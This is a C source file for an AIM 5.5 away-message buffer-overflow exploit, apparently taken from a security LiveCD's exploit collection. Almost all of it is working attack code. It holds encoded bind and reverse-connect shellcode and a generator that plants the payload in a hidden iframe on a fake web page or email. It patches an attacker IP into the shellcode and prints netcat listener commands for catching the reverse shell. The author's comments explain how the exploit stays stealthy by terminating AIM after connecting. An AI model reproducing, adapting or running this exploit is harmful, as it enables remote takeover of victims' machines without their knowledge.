home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / im / aim / aimawayboex.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  22KB  |  389 lines

---

1. /*
2.  * AIM Away Message Buffer Overflow Exploit
3.  *   Exploit by John Bissell A.K.A. HighT1mes
4.  *
5.  * Exploit: 
6.  * ========
7.  *   drizzit.c
8.  *
9.  * Vulnerable Software:
10.  * ====================
11.  *    - AIM 5.5.3588
12.  *    - AIM 5.5.3590 Beta
13.  *    - AIM 5.5.3591
14.  *    - AIM 5.5.3595
15.  *    and a couple others versions...
16.  *
17.  * If you want to try other return addressees for other versions of
18.  * AIM then edit the return address.. But the current one embedded 
19.  * will work for sure with all the AIM versions listed above.
20.  *
21.  * I used some of the metasploit shellcode for this exploit with some
22.  * modifications to get this into stealth mode so it is harder to 
23.  * detect the attack. Since I'm using metasploit shellcode that means this
24.  * exploit can be used on any NT type OS, like win2k, winnt, winxp across
25.  * any service pack.. I don't know about SP2 though I haven't tested
26.  * it yet.
27.  *
28.  * On a side note I pourposly did not include the download+exec shellcode
29.  * even though I have it because I'm sick and tired of these little
30.  * spam/adware bitchs messing peoples computers up for profit.. You can
31.  * still download/upload through the shell to the victim. It just 
32.  * isn't automated like download+exec would be.
33.  *
34.  * In my opinion the reverse connect (-r option) is the most dangerous
35.  * because you can encode your ip address and pick a port, and then 
36.  * when the victim visits the evil web page or email whatever.. then the
37.  * attack will automatically open his AIM even its not already open and
38.  * connect to you and then terminate the AIM process to be stealth so
39.  * the victim doesn't know what him them.. As I remind people in the
40.  * exploit usage you need to remember to use netcat to listen on a 
41.  * port you picked for the exploit to connect to...
42.  *
43.  * One reason I decided to include the generation of html code for 
44.  * this exploit is I noticed almost no puts small limits on the 
45.  * <IFRAME SRC=""> attribute. So when the victim connects to that
46.  * page or reads that email depending on the browser or client, 
47.  * The exploit will execute.. IE 6.0 and Mozilla are 
48.  * affected by this problem as well as Outlook Express when the
49.  * security settings are set to the Internet Zone.
50.  *
51.  * Excuse the sloppy commandline interface I just wanted to get
52.  * this out to the public. 
53.  *
54.  * [ Original advisory posted by Secunia and iDEFENSE. ]
55.  *
56.  * Greets:
57.  * =======
58.  *   IsolationX, YpCat, DaPhire, route, #romhack,
59.  *   Taylor Hayes, Aria Giovanni, Anthony Rocha,
60.  *   InVerse, Deltaflame, Jenna Jameson, iDENFENSE, 
61.  *   secunia, so1o, John Kerry, and many others...
62.  *
63.  * Compiler: 
64.  * =========
65.  *    Visual C++ 6.0
66.  *
67.  * To compile you first must add ws2_32.lib to the Object/librarys modules:
68.  * text box under the Project -> Settings menu; then click on the link tab...
69.  */
70.  
71. #include <stdio.h>
72. #include <stdlib.h>
73. #include <string.h>
74. #include <windows.h>
75.  
76. /* Exploit Data */
77.  
78. char injection_vector[] =
79.  
80.                         "\x61\x69\x6D\x3A\x67\x6F\x61\x77\x61\x79\x3F\x6D\x65\x73\x73\x61"
81.                         "\x67\x65\x3D\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
82.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
83.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
84.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
85.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
86.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
87.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
88.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
89.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
90.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
91.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
92.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
93.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
94.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
95.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
96.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
97.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
98.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
99.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
100.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
101.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
102.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
103.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
104.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
105.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
106.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
107.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
108.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
109.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
110.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
111.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
112.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
113.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
114.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
115.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
116.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
117.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
118.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
119.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
120.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
121.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
122.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
123.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
124.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
125.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
126.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
127.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
128.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
129.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
130.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
131.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
132.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
133.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
134.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
135.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
136.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
137.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
138.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
139.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
140.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
141.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
142.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
143.                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
144.                         "\x41\x41\x41\x41\x41\x41\x41\x41";
145.  
146. char bind_shellcode[] = 
147.  
148.                         "\xEB\x26\x23\x38\x3B\x41\x41"
149.                         "\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34\x24\x58\x58\x58"
150.                         "\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
151.                         "\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
152.                         "\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
153.                         "\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
154.                         "\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
155.                         "\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
156.                         "\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
157.                         "\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
158.                         "\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
159.                         "\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
160.                         "\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
161.                         "\xA3\x6D\xC5\xC5\xFA\x90\x92\xB0\x83\x1B\x74\xF8\x82\xC4\xC1\x6D"
162.                         "\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
163.                         "\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
164.                         "\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
165.                         "\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
166.                         "\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
167.                         "\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
168.                         "\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
169.                         "\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
170.                         "\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
171.                         "\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
172.                         "\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
173.                         "\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
174.  
175. char reverse_shellcode[] =
176.                          
177.                         "\xEB\x08\x41\x41\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34"
178.                         "\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
179.                         "\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
180.                         "\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
181.                         "\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
182.                         "\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
183.                         "\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
184.                         "\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
185.                         "\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
186.                         "\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
187.                         "\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
188.                         "\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
189.                         "\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
190.                         "\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
191.                         "\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
192.                         "\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
193.                         "\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
194.                         "\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
195.                         "\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
196.                         "\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
197.                         "\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
198.                         "\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
199.                         "\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
200.                         "\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
201.  
202. /* Function Prototypes */
203.  
204. void print_usage(char *prog_name);
205. unsigned char xor_data(unsigned char byte);
206.  
207. /* Function Code */
208.  
209. int main(int argc, char *argv[])
210. {
211.         int i                           = 0;
212.         int raw_num                     = 0;
213.         unsigned long port              = 1337; /* default port for bind and reverse attacks */
214.         unsigned long encoded_port      = 0;
215.         unsigned long encoded_ip        = 0;
216.         unsigned char print_raw_exploit = 0;
217.         unsigned char attack_mode       = 2;    /* bind attack by default */
218.         char ip_addr[256];
219.         char exploit[2048];
220.         char str_num[16];
221.         char *p1, *p2;
222.         FILE *EXPLOIT_FP;
223.         char outfile[512];
224.         WSADATA wsa;
225.  
226.  
227.  
228.  
229.         if (argc < 2) print_usage(argv[0]);
230.  
231.         /* process commandline */
232.         for (i = 0; i < argc; i++) {
233.                 if (argv[i][0] == '-') {
234.                         switch (argv[i][1]) {
235.                         case 'r':
236.                                 /* reverse connect */
237.                                 strncpy(ip_addr, argv[i+1], 20);
238.                                 attack_mode = 1;
239.                                 break;
240.                         case 'b':
241.                                 /* bind */
242.                                 attack_mode = 2;
243.                                 break;
244.                         case 'p':
245.                                 port = atoi(argv[i+1]);
246.                                 /* port */
247.                                 break;
248.                         case 'o':
249.                                 print_raw_exploit = 1;
250.                                 break;
251.                         case 'e':
252.                                 strncpy(outfile, argv[i+1], 256);
253.                         }
254.                 }
255.         }
256.  
257.   /* initialize the socket library */
258.   if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
259.     printf("Error: Winsock didn't initialize!\n");
260.     exit(-1);
261.   }
262.  
263.         /* build exploit */
264.         strncpy(exploit, injection_vector, strlen(injection_vector));
265.         exploit[strlen(injection_vector)+1]=0; // tack on NULL byte
266.         encoded_port = htonl(port);
267.         encoded_port += 2;
268.         if (attack_mode == 1) {
269.                 /* reverse connect attack */
270.                 reverse_shellcode[196] = (char) 0x90;
271.         reverse_shellcode[197] = (char) 0x92;
272.                 reverse_shellcode[198] = xor_data((char)((encoded_port >> 16) & 0xff));
273.                 reverse_shellcode[199] = xor_data((char)((encoded_port >> 24) & 0xff));
274.  
275.                 p1 = strchr(ip_addr, '.');
276.                 strncpy(str_num, ip_addr, p1-ip_addr);
277.                 raw_num = atoi(str_num);
278.                 reverse_shellcode[191] = xor_data((char)raw_num);
279.  
280.                 p2 = strchr(p1+1, '.');
281.                 strncpy(str_num, ip_addr+(p1-ip_addr)+1, p2-p1);
282.                 raw_num = atoi(str_num);
283.                 reverse_shellcode[192] = xor_data((char)raw_num);
284.  
285.                 p1 = strchr(p2+1, '.');
286.                 strncpy(str_num, ip_addr+(p2-ip_addr)+1, p1-p2);
287.                 raw_num = atoi(str_num);
288.                 reverse_shellcode[193] = xor_data((char)raw_num);
289.  
290.                 p2 = strrchr(ip_addr, '.');
291.                 strncpy(str_num, p2+1, 5);
292.                 raw_num = atoi(str_num);
293.                 reverse_shellcode[194] = xor_data((char)raw_num);
294.  
295.                 strncat(exploit, reverse_shellcode, sizeof(reverse_shellcode));
296.         }
297.         if (attack_mode == 2) {
298.                 /* bind attack */
299.                 bind_shellcode[204] = (char) 0x90;
300.         bind_shellcode[205] = (char) 0x92;
301.                 bind_shellcode[206] = xor_data((char)((encoded_port >> 16) & 0xff));
302.                 bind_shellcode[207] = xor_data((char)((encoded_port >> 24) & 0xff));
303.                 strncat(exploit, bind_shellcode, sizeof(bind_shellcode));
304.         }
305.  
306.         WSACleanup();
307.  
308.         /* output exploit */
309.         if (print_raw_exploit == 1) {
310.                 printf("%s", exploit);
311.         }
312.         else {
313.                 if ((EXPLOIT_FP = fopen(outfile, "w")) == NULL) {
314.                         fprintf(stderr, "Error: Exploit file can't be created!\n");
315.                         exit(-1);
316.                 }
317.  
318.                 fprintf(EXPLOIT_FP, "<html>\n");
319.                 fprintf(EXPLOIT_FP, "<head>\n");
320.                 fprintf(EXPLOIT_FP, "<title>Hey d00d!</title>\n");
321.                 fprintf(EXPLOIT_FP, "</head>\n");
322.                 fprintf(EXPLOIT_FP, "<body>\n");
323.                 fprintf(EXPLOIT_FP, "Some fake web page or email...\n");
324.                 fprintf(EXPLOIT_FP, "<iframe width=0 height=0 border=0 src=\"");
325.                 fprintf(EXPLOIT_FP, "%s", exploit);
326.                 fprintf(EXPLOIT_FP, "\">\n</iframe>\n");
327.                 fprintf(EXPLOIT_FP, "</body>\n");
328.                 fprintf(EXPLOIT_FP, "<html>\n");
329.  
330.                 fclose(EXPLOIT_FP);
331.  
332.                 /* im to lazy to make a macro for this banner :P */
333.                 printf(" +-------------------------------------------------+\n");
334.                 printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
335.                 printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
336.                 printf(" +-------------------------------------------------+\n\n");
337.  
338.                 printf(" Exploit created!\n\n");
339.  
340.                 printf(" Remember if you use the -r option to have netcat listening\n");
341.                 printf(" on the port you are using for the attack so the victim will\n");
342.                 printf(" be able to connect to you when exploited...\n\n");
343.                 printf(" Example:\n");
344.                 printf("\tnc.exe -l -p %d", port);
345.         }
346.  
347.         return(EXIT_SUCCESS);
348. }
349.  
350. void print_usage(char *prog_name)
351. {
352.         printf(" +-------------------------------------------------+\n");
353.         printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
354.         printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
355.         printf(" +-------------------------------------------------+\n\n");
356.         printf(" Exploit Usage:\n");
357.         printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name);
358.         printf(" Parameters:\n");
359.         printf("\t-r your_ip or -b\t Choose -r for reverse connect attack\
360.  mode\n\t\t\t\t and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or\
361.  -b then a bind\n\t\t\t\t attack will be generated.\n\n");
362.         printf("\t-p (optional)\t\t This option will allow you to change the port\
363.  \n\t\t\t\t used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind then\
364.   the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode is reverse connect\
365.   then the port you\n\t\t\t\t specify will be the one you want to listen\n\t\t\t\t on so the victim can\
366.   connect to you\n\t\t\t\t right away.\n\n");
367.         printf("\t-o or -e outfile\t\t Here you specify the output method...\n\t\t\t\t If you would like\
368.  output go straight to\n\t\t\t\t standerd output then specify the -o option\n\t\t\t\t otherwise give the\
369.  path of where you want to\n\t\t\t\t create the exploit file which is basically\n\t\t\t\t a simple html\
370.  file. The -o option is useful if\n\t\t\t\t you want to test the exploit url in\n\t\t\t\t different
371. ways.\n\n");
372.         printf(" Examples:\n");
373.         printf("\t%s -r 68.6.47.62 -p 8888 -e c:\\exploit.html\n", prog_name);
374.         printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name);
375.         printf("\t%s -b -o\n", prog_name);
376.         printf("\t%s -r 68.6.47.62 -o\n\n", prog_name);
377.         printf(" Remember if you use the -r option to have netcat listening\n");
378.         printf(" on the port you are using for the attack so the victim will\n");
379.         printf(" be able to connect to you when exploited...\n\n");
380.         printf(" Example:\n");
381.         printf("\tnc.exe -l -p 8888");
382.         exit(-1);
383. }
384.  
385. unsigned char xor_data(unsigned char byte)
386. {
387.         return(byte ^ 0x92);
388. }
389.